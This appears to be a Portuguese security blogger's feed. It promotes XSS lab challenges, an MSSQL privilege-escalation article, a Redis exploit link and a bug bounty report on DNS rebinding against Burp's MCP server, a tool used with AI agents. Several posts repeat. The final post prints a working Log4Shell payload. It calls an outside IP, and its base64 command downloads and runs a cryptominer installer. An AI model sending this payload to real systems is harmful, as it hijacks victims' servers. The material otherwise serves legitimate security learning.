MUITO OBRIGADO!
Galera, o site está com muito engajamento, muitos acessos. Isso motiva demais a continuar trazendo conteúdo para vocês.
O site existe somente pra esse propósito: Vocês!
Tenho muito orgulho do que estamos construindo. Se curtiu algum artigo, me deixe saber comentando aqui, reagindo, mandando DM ou mandando para algum amigo!
Abç, zeroc00i
Galera, o site está com muito engajamento, muitos acessos. Isso motiva demais a continuar trazendo conteúdo para vocês.
O site existe somente pra esse propósito: Vocês!
Tenho muito orgulho do que estamos construindo. Se curtiu algum artigo, me deixe saber comentando aqui, reagindo, mandando DM ou mandando para algum amigo!
Abç, zeroc00i
Essa vai pra tu que não sabia como começar os desafios: As resoluções dos desafios foram publicadas no site agora mesmo!!! 😎🥳
Tem os links de cada um na coluna resolução: https://brunomenozzi.com/desafios/acessos/
Ou acesse tambem pelo submenu "Respostas", no menu Desafios
Ufa, agora posso dormir. Disconnected
https://hackerone.com/reports/3176157
Um pesquisador explorou o MCP do Burp usando dns rebinding :) e levou 2k de dolares
Um pesquisador explorou o MCP do Burp usando dns rebinding :) e levou 2k de dolares
“É questão de tempo p/ gente ser obrigado a aprender esses security flaws by design p mitigar ataques atraves do uso de mcp” (zeroc00i nesse grupo, 13 de maio de 2025)
Estamos criando uma página no nosso site onde as resoluções dos 3 desafios de XSS serão publicadas ainda hoje lá!
https://brunomenozzi.com/desafios/acessos/
https://brunomenozzi.com/desafios/acessos/
bom dia!
Desafio 3 de xss publicado agora agora
https://brunomenozzi.com/desafios/xss3.php
Nos comentários vou deixar a lista de parametros que os desafios usam (o foco dos labs é sempre não ter um guessing absurdo e mais lógica mesmo) (sim revisei manualmente e o parametro está ali!)
Desafio 3 de xss publicado agora agora
https://brunomenozzi.com/desafios/xss3.php
Nos comentários vou deixar a lista de parametros que os desafios usam (o foco dos labs é sempre não ter um guessing absurdo e mais lógica mesmo) (sim revisei manualmente e o parametro está ali!)
POST NOVO saindo do forno:
https://brunomenozzi.com/posts/MSSQL/alem_do_dumping/
No post "MSSQL: Além do Dumping", abordamos vulnerabilidades críticas no SQL Server que muitos pentesters desconhecem, indo muito além das técnicas tradicionais.
Além do dumping de tabelas e tentativas de RCE, o post cobre:
• SQL Links para movimento lateral entre servidores
• Ownership chaining entre bancos de dados
• Escalação de privilégios via impersonation
• Técnicas de leitura de arquivos via error-based
• Descoberta de conexões de rede ativas
• Abuso de cadeias de confiança (trust chains)
Revelamos como usuários com poucos privilégios podem se tornar sysadmin explorando configurações inadequadas e funcionalidades nativas do MSSQL, transformando uma simples SQL Injection em acesso completo ao ambiente.
https://brunomenozzi.com/posts/MSSQL/alem_do_dumping/
No post "MSSQL: Além do Dumping", abordamos vulnerabilidades críticas no SQL Server que muitos pentesters desconhecem, indo muito além das técnicas tradicionais.
Além do dumping de tabelas e tentativas de RCE, o post cobre:
• SQL Links para movimento lateral entre servidores
• Ownership chaining entre bancos de dados
• Escalação de privilégios via impersonation
• Técnicas de leitura de arquivos via error-based
• Descoberta de conexões de rede ativas
• Abuso de cadeias de confiança (trust chains)
Revelamos como usuários com poucos privilégios podem se tornar sysadmin explorando configurações inadequadas e funcionalidades nativas do MSSQL, transformando uma simples SQL Injection em acesso completo ao ambiente.
Salve. Resolveu esse desafio de xss já? (https://brunomenozzi.com/desafios/xss.php)
Me contaram que o sysadmin publicou a versão 2 dele.
Dê uma olhada se teu payload ainda funciona!
Se sim, manda o alert(1337) de novo!
https://brunomenozzi.com/desafios/xss2.php
Me contaram que o sysadmin publicou a versão 2 dele.
Dê uma olhada se teu payload ainda funciona!
Se sim, manda o alert(1337) de novo!
https://brunomenozzi.com/desafios/xss2.php
Tu manja de xss? Quero ver então!
Que comece a saga dos mini labs!
https://brunomenozzi.com/desafios/xss.php
Manda aqui nos comentários um PRINT (sem expor o payload que tu usou) c/ um alert(1337)!
Nada de self xss / alert no console do navegador ein hahah
Que comece a saga dos mini labs!
https://brunomenozzi.com/desafios/xss.php
Manda aqui nos comentários um PRINT (sem expor o payload que tu usou) c/ um alert(1337)!
Nada de self xss / alert no console do navegador ein hahah
Lá se vai o Bruno compartilhar mais uma entrevista com o James Kettle. Me aguentem. Sou fã.
https://www.youtube.com/watch?v=KxWx9zJuHO0
https://www.youtube.com/watch?v=KxWx9zJuHO0
CVE-2025-49844 (RediShell) - Proof of Concept
Use-After-Free vulnerability in Redis Lua interpreter
https://github.com/raminfp/redis_exploit
Eu dei uma conferida no source, parece autentico e sem fins maliciosos, mas sempre verifiquem e assuma o risco por sua conta
Use-After-Free vulnerability in Redis Lua interpreter
https://github.com/raminfp/redis_exploit
Eu dei uma conferida no source, parece autentico e sem fins maliciosos, mas sempre verifiquem e assuma o risco por sua conta
Alguém on aí pra eu pedir um favor de teste no site (acessar e ficar navegando)?
https://brunomenozzi.com/
https://brunomenozzi.com/
Isso independe do que tu ta executando na tua VPS. No meu caso o blog foi feito com hugo + o tema geekdocs.
Como vocês são hackers, eu vou de site estático mesmo hahaha
Payload:
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')